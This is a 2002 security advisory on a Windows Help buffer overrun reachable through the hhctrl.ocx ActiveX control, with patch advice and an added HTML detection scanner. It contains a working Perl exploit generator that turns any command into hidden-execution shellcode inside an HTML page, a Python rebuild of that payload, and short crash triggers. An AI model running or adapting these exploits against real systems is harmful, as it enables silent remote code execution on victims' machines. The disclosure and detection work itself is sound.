
Winhlp32.exe Remote BufferOverrun



2nd Aug 2002 [SBWID-5590]
COMMAND

	Winhlp32.exe, Windows Help System Buffer Overflow

SYSTEMS AFFECTED

	Windows XP, 2000, NT, ME and 98
	

	

PROBLEM

	Mark Litchfield [mark@ngssoftware.com] of NGSSoftware
	[http://www.ngssoftware.com] in advisory [#NISR01082002] :
	

	Many of the features available in HTML Help are implemented through the
	HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control
	is used to provide navigation features (such as a table of contents),
	to display secondary windows and pop-up definitions, and to provide
	other features. The HTML Help ActiveX control can be used from topics
	in a compiled Help system as well as from HTML pages displayed in a web
	browser. The functionality provided by the HTML Help ActiveX control
	will run in the HTML Help Viewer or in any browser that supports
	ActiveX technology, such as Internet Explorer (version 3.01 or later).
	Some features, such as the WinHlp command, provided by the HTML Help
	ActiveX control are meant to be available only when it is used from a
	compiled HTML Help file (.chm) that is displayed by using the HTML Help
	Viewer.
	

	 Details

	 *******

	

	Winhlp32.exe is vulnerable to a buffer overrun attack using the Item
	parameter of the WinHlp command. The Item parameter is used to specify
	the file path of the WinHelp (.hlp) file in which the WinHelp topic is
	stored, and the window name of the target window. Using this overrun,
	an attacker can successfully execute arbitrary code on a remote system
	by either encouraging the victim to visit a particular web page,
	whereby code would execute automatically, or by including the exploit
	within the source of an email. In regards to email, execution would
	automatically occur when the mail appears in the preview pane and
	ActiveX objects are allowed (this is allowed by default; the Internet
	Security Settings would have to be set to HIGH to prevent execution of
	this vulnerability). Any exploit would execute in the context of the
	logged-on user.
	

	

	 Exploit (Update 20 August 2002)

	 =======

	

# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernell32 jmp ebx 77E87793

# Decoder/loader stub. Control arrives here through "jmp ebx" ($EIP2), so
# ebx points at the first byte of this stub. The stub scans forward for the
# "zzzz" marker, subtracts 0x41 from every byte of the encoded command until
# it meets the "XXXX" marker, turns that marker into a NUL terminator and
# calls WinExec(command, SW_HIDE).
$sploit =
"\x55\x8b\xec\x8b\xc3".          # push ebp; mov ebp,esp; mov eax,ebx  (\xc5 is ebp change if error)
"\xbe\xff\xff\xff\xff".          # mov esi, 0xffffffff
"\x81\xEE\x85\x85\x85\x85".      # sub esi, 0x85858585   -> esi = "zzzz"
"\x83\xc0\x01".                  # add eax, 1
"\x8b\x10".                      # mov edx, [eax]
"\x3b\xd6".                      # cmp edx, esi
"\x75\xf7".                      # jne back to "add eax,1" until "zzzz" is found
"\x8b\xd8".                      # mov ebx, eax
"\x83\xc3\x01".                  # add ebx, 1
"\x80\x6b\x03\x41".              # sub byte [ebx+3], 0x41  (undoes the +65 of encode())
"\x8b\x7b\x04".                  # mov edi, [ebx+4]
"\x81\xff\x58\x58\x58\x58".      # cmp edi, "XXXX"
"\x75\xEE".                      # jne back to "add ebx,1"
"\x81\x6b\x04\x58\x58\x58\x58".  # sub dword [ebx+4], "XXXX" -> NUL terminator
"\x33\xf6".                      # xor esi, esi
"\x56".                          # push esi              (uCmdShow = SW_HIDE)
"\x83\xc0\x04".                  # add eax, 4            (eax -> decoded command)
"\x50".                          # push eax              (lpCmdLine)
"\xbb\x94\xee\xe8\x77".          # mov ebx, 0x77e8ee94 winexec() address
"\xff\xd3";                      # call ebx

# Exit routine run after WinExec returns.
$exitproc =
"\xBB\x5d\xa9\xe8\x77".          # mov ebx, 0x77e8a95d
"\x83\xeb\x01".                  # sub ebx, 1
"\xff\xd3";                      # call ebx

$RET  = "\x24\xF1\x5d\x01";
$EIP2 = "\x93\x77\xe8\x77";      # 0x77e87793, jmp ebx - This works
#$EIP2 = "\xf6\xbf\x30\x78";
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";

print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
$command = <STDIN>;
print "Enter Output File: ";
$outputfile = <STDIN>;
chomp $command;
chomp $outputfile;
open(INFILE, ">$outputfile") or die "cannot open $outputfile: $!";
$command = encode($command);
$nn   = 123 - length($command);  # NOP pad keeps the total payload length constant
$nops = "\x90" x $nn;

# stub | "zzzz" | encoded command | "XXXX" | NOPs | exit routine | RET | jmp ebx
$exploit = $sploit . "zzzz" . $command . 'XXXX' . $nops . $exitproc . $RET . $EIP2;

# The payload is carried in the Item1 parameter of the WinHelp command and
# fired by calling HHClick() on the control.
$f1 = <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE='
file1
chomp $f1;

$f2 = <<"file2";
'><PARAM
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
file2

print INFILE $f1 . $exploit . $f2;
close(INFILE);

# Add 65 to every character of the command; the stub's
# "sub byte [ebx+3], 0x41" reverses this at run time.
sub encode {
    my ($command) = @_;
    my $newchar   = "";
    for (my $i = 0; $i < length($command); $i++) {
        my $chartoconvert = ord(substr($command, $i, 1));  # pull out each character as a number
        $chartoconvert += 65;
        $newchar .= chr($chartoconvert);                   # convert back to chr
    }
    print $newchar;
    return $newchar;
}
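The Perl above builds the payload but gives no way to check, without a Windows 2000 box, that the layout and the decoder stub agree. The following is an added example written for this page, not code from the original page or from Sec-1: it rebuilds the same layout in Python and emulates the stub's two loops over the result. Only the stub bytes, $exitproc, $RET, $EIP2, the "zzzz"/"XXXX" markers, the +65 encoding and the 123-byte NOP area are taken from the Perl; the rules in check_command() are assumptions drawn from reading the stub, not from the advisory.

```python
"""Payload layout of the Sec-1 winhlp32 exploit, rebuilt with an emulator
for its decoder stub (added example, not code from the page or Sec-1).

What $sploit does once $EIP2 ("jmp ebx") lands on it:
  1. eax = ebx (stub start); step eax forward until [eax] == "zzzz";
  2. ebx = eax; each iteration: ebx += 1, [ebx+3] -= 0x41, stop once
     [ebx+4] == "XXXX"  (this undoes the +65 applied by encode());
  3. [ebx+4] -= 0x58585858, turning "XXXX" into the command's NUL;
  4. push 0 (SW_HIDE), push eax+4 (decoded command), call WinExec.
"""
import struct

SPLOIT = bytes.fromhex(                      # the $sploit bytes from the page
    "558bec8bc3" "beffffffff" "81ee85858585" "83c001" "8b10" "3bd6" "75f7"
    "8bd8" "83c301" "806b0341" "8b7b04" "81ff58585858" "75ee"
    "816b0458585858" "33f6" "56" "83c004" "50" "bb94eee877" "ffd3")
EXITPROC = bytes.fromhex("bb5da9e877" "83eb01" "ffd3")
RET = b"\x24\xf1\x5d\x01"
EIP2 = b"\x93\x77\xe8\x77"                   # 0x77e87793, "jmp ebx" in kernel32 5.0.2195.4272
START_MARK, END_MARK = b"zzzz", b"XXXX"
KEY = 65                                     # encode() adds 65; stub subtracts 0x41
NOP_AREA = 123                               # "$nn = 123 - length($command)"


def encode(command: bytes) -> bytes:
    """Same transform as the Perl encode(): add 65 to every byte."""
    return bytes(b + KEY for b in command)


def check_command(command: bytes) -> list:
    """Inputs for which the page's layout or stub breaks (assumed from reading
    the stub, not stated by the advisory)."""
    problems = []
    if not command:
        problems.append("empty: the stub decodes the end marker itself and runs on")
    if len(command) > NOP_AREA:
        problems.append("longer than %d bytes: NOP pad goes negative, RET/EIP2 shift" % NOP_AREA)
    if any(b + KEY > 0xFF for b in command):
        problems.append("byte above 190: encoded value does not fit in one byte")
    return problems


def build_payload(command: bytes) -> bytes:
    """stub | zzzz | encoded command | XXXX | NOPs | exit routine | RET | jmp ebx"""
    problems = check_command(command)
    if problems:
        raise ValueError("; ".join(problems))
    nops = b"\x90" * (NOP_AREA - len(command))
    return SPLOIT + START_MARK + encode(command) + END_MARK + nops + EXITPROC + RET + EIP2


def emulate_decoder(mem: bytearray) -> bytes:
    """Walk the stub's two loops over `mem` as if ebx pointed at mem[0] and
    return the string WinExec would receive. Mutates `mem` like the stub."""
    eax = 0
    while True:                              # loop 1: find "zzzz"
        eax += 1
        if eax + 4 > len(mem):
            raise RuntimeError("start marker never found")
        if mem[eax:eax + 4] == START_MARK:
            break
    ebx = eax
    while True:                              # loop 2: decode until "XXXX"
        ebx += 1
        if ebx + 8 > len(mem):
            raise RuntimeError("end marker never found: stub reads past the payload")
        mem[ebx + 3] = (mem[ebx + 3] - KEY) & 0xFF
        if mem[ebx + 4:ebx + 8] == END_MARK:
            break
    dword = struct.unpack("<I", mem[ebx + 4:ebx + 8])[0]
    mem[ebx + 4:ebx + 8] = struct.pack("<I", (dword - 0x58585858) & 0xFFFFFFFF)
    start = eax + 4                          # "add eax, 4" before "push eax"
    return bytes(mem[start:mem.index(0, start)])


if __name__ == "__main__":
    payload = build_payload(b"calc.exe")
    print(len(payload), "bytes; decoded:", emulate_decoder(bytearray(payload)))
    print("empty command:", check_command(b""))
```

Two properties fall out of the emulation: the total length is 215 bytes whatever the command, which is what keeps $RET and $EIP2 at the overflow's fixed offset, and an empty command makes the stub decode the "XXXX" marker itself and walk off the end of the payload.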

	

	

	-Also-
		

	Jelmer adds :
		

	I just installed service pack 3 and the following code still crashed
	my IE6 with a "memory could not be referenced" error.
	

	<OBJECT ID=hhctrl TYPE="application/x-oleobject"
	CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
	<PARAM name="Command" value="Shortcut">
	<PARAM name="Button" value="Bitmap:shortcut">
	<PARAM name="Item1" value=",,">
	<PARAM name="Item2" value="273,1,1">
	<PARAM name="codebase" value="">
	<!-- the overlong value goes in the Font parameter -->
	<PARAM name="Font" value=" A VERY VERY LONG STRING ">
	</OBJECT>

		

	I have been told this means it is most likely exploitable. I am not
	into buffer overflows myself though; maybe someone can confirm this.
	Anyways, I notified Microsoft of this several months ago. The day after
	I notified them someone pointed me to the ngssoftware advisory *sob*,
	and I notified Microsoft that this was probably the same issue. Last I
	heard from them they were looking into whether this was indeed the case.
	It's been several months and as far as I know they are still looking.
	

	 Update (03 October 2002)

	 ======

	

	David Litchfield [david@ngssoftware.com] of NGS Insight Security
	Research in a new advisory [#NISR02102002], says :
	

	 http://www.ngssoftware.com/advisories/ms-winhlp.txt

	

	

	--snapp--
	

	The Windows Help system includes an ActiveX control known as the HTML
	Help Control, hhctrl.ocx. The "Alink" function of this control is
	vulnerable to a buffer overflow that can be exploited to gain control
	of the user's machine.
	

	--snapp--
	

	

	 Update (10 October 2002)

	 ======

	

	In Thor Larholm [thor@pivx.com] advisory [http://www.pivx.com] :
	

	--snipp--
	

	we feel that it will benefit and empower end users more if they are able
	to easily verify for themselves whether they are using a vulnerable
	version of Windows Help. Others have recently made the public aware of
	this vulnerability as well, though without disclosing any actual
	details.
	

	Exploit:
	

	<script>showHelp(new Array(797).join("A")); /* 796 bytes of "A" as the argument */</script>

	

	

	Simple one-click test case
	

	http://www.pivx.com/larholm/adv/TL004/simple.html

	

	Try your own numbers
	

	http://www.pivx.com/larholm/adv/TL004/number.html

	

	

	--snapp--
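The three triggers collected on this page (Command=WinHelp with an overlong Item1 fired by HHClick(), Command=Shortcut with an overlong Font, and showHelp() with an overlong argument) share a shape that can be matched in HTML mail bodies or proxied pages before they reach an unpatched Internet Explorer. The scanner below is an added example written for this page, not code from NGSSoftware, PiVX or Sec-1. The thresholds LONG_PARAM and LONG_ARG are assumptions chosen well below the sizes the page reports, and the four sample documents are constructed inputs, not captured traffic.

```python
"""Flag hhctrl.ocx abuse patterns in HTML (added example, assumptions marked).

Signals:
  * an <object> carrying the HTML Help control CLSID or a codebase naming
    hhctrl.ocx whose Command is WinHelp/Shortcut/ALink and/or whose PARAM
    values are longer than any sane .hlp path or window name;
  * script that calls showHelp() with an overlong or computed argument, or
    that fires the control via HHClick().
"""
from html.parser import HTMLParser

HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
RISKY_COMMANDS = ("winhelp", "shortcut", "alink")
LONG_PARAM = 200     # assumption: legitimate help paths/window names are far shorter
LONG_ARG = 256       # assumption: below Larholm's 796 so smaller probes are caught too


def _call_arguments(js, name):
    """Yield the raw text between the parentheses of each `name(...)` call,
    tracking nesting so inner parentheses do not end the argument early."""
    pos = 0
    while True:
        i = js.find(name, pos)
        if i < 0:
            return
        j = js.find("(", i + len(name))
        if j < 0 or js[i + len(name):j].strip():
            pos = i + len(name)
            continue
        depth, k = 0, j
        while k < len(js):
            if js[k] == "(":
                depth += 1
            elif js[k] == ")":
                depth -= 1
                if depth == 0:
                    break
            k += 1
        yield js[j + 1:k]
        pos = k + 1 if k < len(js) else len(js)


def _is_string_literal(s):
    return len(s) >= 2 and s[0] in "'\"" and s[-1] == s[0] and s[0] not in s[1:-1]


class HHCtrlScanner(HTMLParser):
    """Collects (severity, detail) findings while parsing one document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._obj = None            # state of the hhctrl <object> being parsed
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            ident = (a.get("classid", "") + " " + a.get("codebase", "")).lower()
            if HHCTRL_CLSID in ident or "hhctrl.ocx" in ident:
                self._obj = {"command": "", "long": []}
        elif tag == "param" and self._obj is not None:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "command":
                self._obj["command"] = value.strip().lower()
            elif len(value) > LONG_PARAM:
                self._obj["long"].append((name, len(value)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "object" and self._obj is not None:
            self._finish_object()
            self._obj = None
        elif tag == "script":
            self._in_script = False
            self._scan_script("".join(self._script))
            self._script = []

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def _finish_object(self):
        cmd, long_params = self._obj["command"], self._obj["long"]
        if long_params:
            sev = "high" if cmd in RISKY_COMMANDS else "medium"
            self.findings.append((sev, "hhctrl Command=%r with oversized PARAM(s) %s" % (cmd, long_params)))
        elif cmd in RISKY_COMMANDS:
            self.findings.append(("low", "hhctrl Command=%r (inspect manually)" % cmd))
        # short params with a navigation command: ordinary TOC/index usage

    def _scan_script(self, js):
        for _ in _call_arguments(js, "HHClick"):
            self.findings.append(("medium", "script fires the control via HHClick()"))
        for arg in _call_arguments(js, "showHelp"):
            arg = arg.strip()
            if _is_string_literal(arg):
                if len(arg) - 2 > LONG_ARG:
                    self.findings.append(("high", "showHelp() with a %d-char literal" % (len(arg) - 2)))
            else:
                self.findings.append(("medium", "showHelp() with a computed argument: %s" % arg[:60]))


def scan_html(text):
    p = HHCtrlScanner()
    p.feed(text)
    p.close()
    return p.findings


# Constructed samples (not captured traffic): one benign TOC, the three shapes above.
BENIGN = ('<object classid="clsid:%s" id="toc"><param name="Command" value="Contents">'
          '<param name="Item1" value="toc.hhc"></object>') % HHCTRL_CLSID
WINHELP_OVERRUN = ('<OBJECT classid=clsid:%s codeBase=hhctrl.ocx#Version=4,72,8252,0 id=winhelp>'
                   '<PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE=\'%s\'>'
                   '<PARAM NAME="Item2" VALUE="x"></OBJECT><SCRIPT>winhelp.HHClick()</SCRIPT>'
                   ) % (HHCTRL_CLSID, "A" * 300)
SHORTCUT_FONT = ('<OBJECT ID=hhctrl TYPE="application/x-oleobject" CLASSID="clsid:%s">'
                 '<PARAM name="Command" value="Shortcut"><PARAM name="Item1" value=",,">'
                 '<PARAM name="Font" value="%s"></OBJECT>') % (HHCTRL_CLSID, "A" * 1000)
SHOWHELP_PROBE = '<script>showHelp("%s");</script>' % ("A" * 796)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("winhelp", WINHELP_OVERRUN),
                       ("shortcut", SHORTCUT_FONT), ("showHelp", SHOWHELP_PROBE)):
        print(label, scan_html(doc))
```

The object check keys on the CLSID and on the codebase rather than on the element id, since both exploits on this page choose their own id; a computed showHelp() argument is reported at medium because its length cannot be bounded without executing the script.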

SOLUTION

	NGSSoftware highly recommend installing Windows 2000 Service Pack 3,
	into which the fix has been built, available from
	

	http://www.microsoft.com

	

	An alternative to patching is to set the security level in Internet
	Options to High. The Medium setting is not sufficient: its promise
	that unsigned ActiveX controls will not be downloaded does not apply,
	because hhctrl.ocx already ships with Windows and nothing needs to be
	downloaded, so NGSSoftware's proof of concept ("Kylie") still executes
	Calc.exe under Medium. Another alternative is to remove winhlp32.exe
	if it is not required within your environment.
	

	 Update (03 October 2002)

	 ======

	

	Microsoft has released a patch, described in security bulletin
	MS02-055, available from their web site. More details are available from :
	

	http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp

	

	

